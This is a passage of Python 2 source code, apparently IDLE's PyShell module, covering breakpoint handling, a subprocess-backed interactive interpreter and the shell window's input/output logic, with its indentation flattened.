warnings.formatwarning = idle_formatwarning
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
if self.io.filename: self.restore_file_breaks()
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text. Certain
# kinds of edits cause these ranges to be deleted: Inserting
# or deleting a line just before a breakpoint, and certain
# deletions prior to a breakpoint. These issues need to be
# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath,"r") as old_file:
lines = old_file.readlines()
except IOError:
lines = []
try:
with open(self.breakpointPath,"w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except IOError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
from idlelib import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding)
self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding)
self.console = PseudoOutputFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
        # (but only if it is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from idlelib.StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super(PyShell, self).rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert', '<', 'iomark'):
return 'disabled'
return super(PyShell, self).rmenu_check_paste()
class PseudoFile(io.TextIOBase):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self._encoding = encoding
@property
def encoding(self):
return self._encoding
@property
def name(self):
return '<%s>' % self.tags
def isatty(self):
return True
class PseudoOutputFile(PseudoFile):
def writable(self):
return True
def write(self, s):
if self.closed:
raise ValueError("write to closed file")
if not isinstance(s, (basestring, bytearray)):
raise TypeError('must be string, not ' + type(s).__name__)
return self.shell.write(s, self.tags)
class PseudoInputFile(PseudoFile):
def __init__(self, shell, tags, encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self._line_buffer = ''
